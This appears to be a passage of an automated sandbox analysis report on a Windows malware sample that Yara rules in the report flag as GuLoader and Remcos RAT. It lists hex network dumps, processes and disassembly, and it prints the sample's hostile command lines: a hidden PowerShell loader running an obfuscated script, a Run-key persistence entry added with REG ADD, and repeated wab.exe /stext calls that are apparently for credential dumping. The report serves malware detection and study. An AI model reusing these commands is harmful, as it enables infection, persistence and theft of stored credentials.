                                                    2024-05-03 07:43:49 UTC1369INData Raw: 06 02 8b ac 5b 1f f0 f9 4a 79 be 57 d2 4a b3 ee 65 3b 48 a6 ef f7 61 0c 6c 61 5f 3f 92 b7 31 b8 19 9d 5a b1 6c 45 81 7f c8 23 e4 f2 1a 74 bf 8c 8e 61 85 dc 3c ca 69 ae 8a 8b 78 0b 29 74 24 a3 99 cf b4 4e 7b ce f6 86 49 e3 cc aa 57 53 01 86 2d b0 08 dc 85 31 c1 2b 05 e1 d3 3e 14 df 77 0c 7e 5b 8b 8e 47 25 d4 2b 1e fe 55 e0 20 c5 bb 50 59 e3 4f ec c4 69 0f db 1d 81 a1 cf 62 cb 91 e4 d9 99 95 d4 9f 84 36 1e 19 25 31 56 68 5a 52 01 57 8a d7 b3 82 63 7b 90 04 b7 0c 33 a1 b6 2a 3f 5d f2 2f 2a f1 dc 0d f7 a3 3f 29 da 13 45 ee 20 04 23 60 aa fd b9 2c 0e 52 6a ab c6 b4 d1 a1 96 18 5d c0 c5 d3 a5 04 e9 7a 97 ff 5f 71 0b 3d 77 12 26 4d eb d3 d3 e0 ba 62 4d 48 3b cb cf f2 c1 1f 7b f3 08 54 ce 03 73 8b b8 d5 7b 9f 0d 03 56 bb 70 11 49 d4 60 e5 a5 50 65 f6 49 31 dc 1e
                                                    Data Ascii: [JyWJe;Hala_?1ZlE#ta<ix)t$N{IWS-1+>w~[G%+U PYOib6%1VhZRWc{3*?]/*?)E #`,Rj]z_q=w&MbMH;{Ts{VpI`PeI1
                                                    2024-05-03 07:43:49 UTC1369INData Raw: b6 e0 0d 43 f2 c9 c8 01 6e d1 af 35 4a 95 27 25 b9 73 4d be 8d 4b c5 7d 2b 28 9f 97 31 fe c5 ea 84 7b 31 72 45 1f 8c cf cf 3f f8 9e c4 fe d1 13 9c 18 b7 64 15 7c 4d 31 20 22 72 05 09 4f 0c b3 a7 8a cd 67 2e 71 84 6c d2 32 2b be 98 77 6a bf 0d 19 45 42 b6 9a 37 6b 22 34 ec 0d 2c c8 2e 37 10 ee 8e c6 5b 7c cb 11 05 5d 76 2d 2c bc 93 06 91 3f 48 a6 9b 69 de ca 10 45 4b 87 b1 a2 e2 94 67 2a 5a 35 e4 0b ca ca b2 1f fa d4 fd e8 c6 6e 8e ea 8a 28 5f 9d 50 ae 22 5e 43 73 cf 60 db bd bc 2c 28 ed 72 31 82 4b b7 0b 48 42 fb 27 de 66 31 27 53 34 f9 db 3e d4 fa c4 1f 38 9f 11 24 bd 78 aa 74 98 eb eb 5f f3 a7 23 a3 1f df 4e 8e b6 7d 68 6b 4e 80 4d 17 94 66 a0 0b 4e 71 6b 0e fb 17 7f 3c 68 9f 84 bd 79 79 05 cc 51 ab d3 16 4f 76 db 3e 3f dd 17 fc b6 0c a2 1e 33 dd f9 6a
                                                    Data Ascii: Cn5J'%sMK}+(1{1rE?d|M1 "rOg.ql2+wjEB7k"4,.7[|]v-,?HiEKg*Z5n(_P"^Cs`,(r1KHB'f1'S4>8$xt_#N}hkNMfNqk<hyyQOv>?3j
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 10 d0 b3 a2 95 4c 8d dd be ee 7d 62 ca e4 96 f4 ea 44 90 13 68 74 0a 05 0b 65 d2 58 62 09 64 3d e3 f4 17 0b fc 25 44 4e 99 a1 6d ce 0b 51 f3 ed a4 d5 0b 10 5e 45 15 67 56 a2 f4 7a 57 ef c6 5e de c3 7d 05 fd b9 e0 3c d2 08 7a 59 27 99 dd 6a fe f4 2d 88 b2 45 a8 41 b1 05 cb 9f fd 90 d5 15 cb 08 41 aa 5d bb 8e 3e 6e d1 af 35 79 8d 27 25 b9 16 08 6b 9a f8 46 b9 27 f3 da 0c 31 62 36 15 7b ad a8 a7 08 a4 8a cf cf 3f 19 af 46 81 c1 98 47 c4 6d 8d 0b 2d c6 dd 61 57 7e ed 49 ba 7e 09 3c 9e 01 8c 4d 87 40 ef 90 ae 66 78 d4 27 09 16 5a aa 9e 1f c4 70 fc 6c 95 20 13 91 ce df 05 20 06 97 00 8b 53 7a ce d2 19 91 0a da d2 81 14 c2 74 92 75 55 64 6e d8 12 e7 3d 7b 1c 15 a3 5d 29 1f 2c 4d b3 c5 70 f5 35 e5 c4 a6 7b a9 24 bf d6 99 ea 4f 2f 2b ac f5 75 55 83 73 54 03 52 d4
                                                    Data Ascii: L}bDhteXbd=%DNmQ^EgVzW^}<zY'j-EAA]>n5y'%kF'1b6{?FGm-aW~I~<M@fx'Zpl SztuUdn={]),Mp5{$O/+uUsTR


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:42:54
                                                    Start date:03/05/2024
                                                    Path:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"
                                                    Imagebase:0x400000
                                                    File size:501'952 bytes
                                                    MD5 hash:DA38292DF7F99C9CF99629E84D934BD6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:09:42:58
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
                                                    Imagebase:0xd40000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2204905580.0000000009858000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:09:42:58
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:09:42:59
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                    Imagebase:0x240000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:09:43:43
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:09:43:48
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
                                                    Imagebase:0x240000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:09:43:48
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:09:43:48
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
                                                    Imagebase:0xf90000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:09:43:54
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:09:43:54
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:09:43:54
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:09:43:56
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:09:43:57
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:09:43:57
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:09:44:09
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:09:44:09
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:09:44:09
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:38
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:40
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:43
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:44
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:45
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:20.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:16.8%
                                                      Total number of Nodes:1384
                                                      Total number of Limit Nodes:26
                                                      execution_graph 4038 4047c0 4039 4047d8 4038->4039 4046 4048f2 4038->4046 4043 404601 22 API calls 4039->4043 4040 40495c 4041 404a26 4040->4041 4042 404966 GetDlgItem 4040->4042 4048 404668 8 API calls 4041->4048 4044 404980 4042->4044 4045 4049e7 4042->4045 4047 40483f 4043->4047 4044->4045 4053 4049a6 SendMessageW LoadCursorW SetCursor 4044->4053 4045->4041 4054 4049f9 4045->4054 4046->4040 4046->4041 4049 40492d GetDlgItem SendMessageW 4046->4049 4051 404601 22 API calls 4047->4051 4052 404a21 4048->4052 4071 404623 KiUserCallbackDispatcher 4049->4071 4056 40484c CheckDlgButton 4051->4056 4075 404a6f 4053->4075 4058 404a0f 4054->4058 4059 4049ff SendMessageW 4054->4059 4055 404957 4072 404a4b 4055->4072 4069 404623 KiUserCallbackDispatcher 4056->4069 4058->4052 4063 404a15 SendMessageW 4058->4063 4059->4058 4063->4052 4064 40486a GetDlgItem 4070 404636 SendMessageW 4064->4070 4066 404880 SendMessageW 4067 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40489d GetSysColor 4066->4068 4067->4052 4068->4067 4069->4064 4070->4066 4071->4055 4073 404a59 4072->4073 4074 404a5e SendMessageW 4072->4074 4073->4074 4074->4040 4078 405ca8 ShellExecuteExW 4075->4078 4077 4049d5 LoadCursorW SetCursor 4077->4045 4078->4077 4079 402643 4080 402672 4079->4080 4081 402657 4079->4081 4083 4026a2 4080->4083 4084 402677 4080->4084 4082 402d89 21 API calls 4081->4082 4092 40265e 4082->4092 4086 402dab 21 API calls 4083->4086 4085 402dab 21 API calls 4084->4085 4088 40267e 4085->4088 4087 4026a9 lstrlenW 4086->4087 4087->4092 4096 4066a4 WideCharToMultiByte 4088->4096 4090 402692 lstrlenA 4090->4092 4091 4026ec 4092->4091 4095 4026d6 4092->4095 4097 406253 SetFilePointer 4092->4097 4093 406224 WriteFile 4093->4091 4095->4091 4095->4093 4096->4090 4098 406287 4097->4098 4099 40626f 4097->4099 4098->4095 4100 4061f5 ReadFile 4099->4100 4101 40627b 4100->4101 4101->4098 4102 406290 SetFilePointer 4101->4102 4103 4062b8 SetFilePointer 4101->4103 4102->4103 4104 40629b 4102->4104 4103->4098 4105 406224 WriteFile 4104->4105 4105->4098 3554 403645 SetErrorMode GetVersionExW 3555 4036d1 3554->3555 3556 403699 GetVersionExW 3554->3556 3557 403728 3555->3557 3558 406a76 5 API calls 3555->3558 3556->3555 3559 406a06 3 API calls 3557->3559 3558->3557 3560 40373e lstrlenA 3559->3560 3560->3557 3561 40374e 3560->3561 3562 406a76 5 API calls 3561->3562 3563 403755 3562->3563 3564 406a76 5 API calls 3563->3564 3565 40375c 3564->3565 3566 406a76 5 API calls 3565->3566 3567 403768 #17 OleInitialize SHGetFileInfoW 3566->3567 3642 406682 lstrcpynW 3567->3642 3570 4037b7 GetCommandLineW 3643 406682 lstrcpynW 3570->3643 3572 4037c9 3573 405f7e CharNextW 3572->3573 3574 4037ef CharNextW 3573->3574 3584 403801 3574->3584 3575 403903 3576 403917 GetTempPathW 3575->3576 3644 403614 3576->3644 3578 40392f 3580 403933 GetWindowsDirectoryW lstrcatW 3578->3580 3581 403989 DeleteFileW 3578->3581 3579 405f7e CharNextW 3579->3584 3582 403614 12 API calls 3580->3582 3654 4030d5 GetTickCount GetModuleFileNameW 3581->3654 3585 40394f 3582->3585 3584->3575 3584->3579 3588 403905 3584->3588 3585->3581 3587 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3585->3587 3586 40399d 3594 405f7e CharNextW 3586->3594 3625 403a44 3586->3625 3633 403a54 3586->3633 3589 403614 12 API calls 3587->3589 3740 406682 lstrcpynW 3588->3740 3592 403981 3589->3592 3592->3581 3592->3633 3598 4039bc 3594->3598 3596 403ba2 3599 405ce2 MessageBoxIndirectW 3596->3599 3597 403bc6 3600 403c4a ExitProcess 3597->3600 3601 403bce GetCurrentProcess OpenProcessToken 3597->3601 3602 403a1a 3598->3602 3603 403a5d 3598->3603 3605 403bb0 ExitProcess 3599->3605 3606 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 3601->3606 3607 403c1a 3601->3607 3741 406059 3602->3741 3757 405c4d 3603->3757 3606->3607 3608 406a76 5 API calls 3607->3608 3611 403c21 3608->3611 3615 403c36 ExitWindowsEx 3611->3615 3617 403c43 3611->3617 3615->3600 3615->3617 3616 403a7c 3619 403a85 3616->3619 3639 403a94 3616->3639 3620 40140b 2 API calls 3617->3620 3761 406682 lstrcpynW 3619->3761 3620->3600 3621 403a39 3756 406682 lstrcpynW 3621->3756 3624 403aba wsprintfW 3626 4066bf 21 API calls 3624->3626 3684 403d54 3625->3684 3626->3639 3629 403b30 SetCurrentDirectoryW 3807 406442 MoveFileExW 3629->3807 3630 403af6 GetFileAttributesW 3631 403b02 DeleteFileW 3630->3631 3630->3639 3631->3639 3814 403c62 3633->3814 3636 406442 40 API calls 3636->3639 3637 4066bf 21 API calls 3637->3639 3639->3624 3639->3629 3639->3630 3639->3633 3639->3636 3639->3637 3640 403bb8 CloseHandle 3639->3640 3641 4069df 2 API calls 3639->3641 3762 405bd6 CreateDirectoryW 3639->3762 3765 405c30 CreateDirectoryW 3639->3765 3768 405d8e 3639->3768 3811 405c65 CreateProcessW 3639->3811 3640->3633 3641->3639 3642->3570 3643->3572 3645 406930 5 API calls 3644->3645 3647 403620 3645->3647 3646 40362a 3646->3578 3647->3646 3648 405f51 3 API calls 3647->3648 3649 403632 3648->3649 3650 405c30 2 API calls 3649->3650 3651 403638 3650->3651 3823 4061a1 3651->3823 3827 406172 GetFileAttributesW CreateFileW 3654->3827 3656 403118 3683 403125 3656->3683 3828 406682 lstrcpynW 3656->3828 3658 40313b 3829 405f9d lstrlenW 3658->3829 3662 40314c GetFileSize 3663 403246 3662->3663 3682 403163 3662->3682 3664 403033 36 API calls 3663->3664 3665 40324f 3664->3665 3667 40328b GlobalAlloc 3665->3667 3665->3683 3835 4035fd SetFilePointer 3665->3835 3666 4035e7 ReadFile 3666->3682 3668 4032a2 3667->3668 3673 4061a1 2 API calls 3668->3673 3670 4032e3 3671 403033 36 API calls 3670->3671 3671->3683 3672 40326c 3674 4035e7 ReadFile 3672->3674 3675 4032b3 CreateFileW 3673->3675 3677 403277 3674->3677 3678 4032ed 3675->3678 3675->3683 3676 403033 36 API calls 3676->3682 3677->3667 3677->3683 3834 4035fd SetFilePointer 3678->3834 3680 4032fb 3681 403376 48 API calls 3680->3681 3681->3683 3682->3663 3682->3666 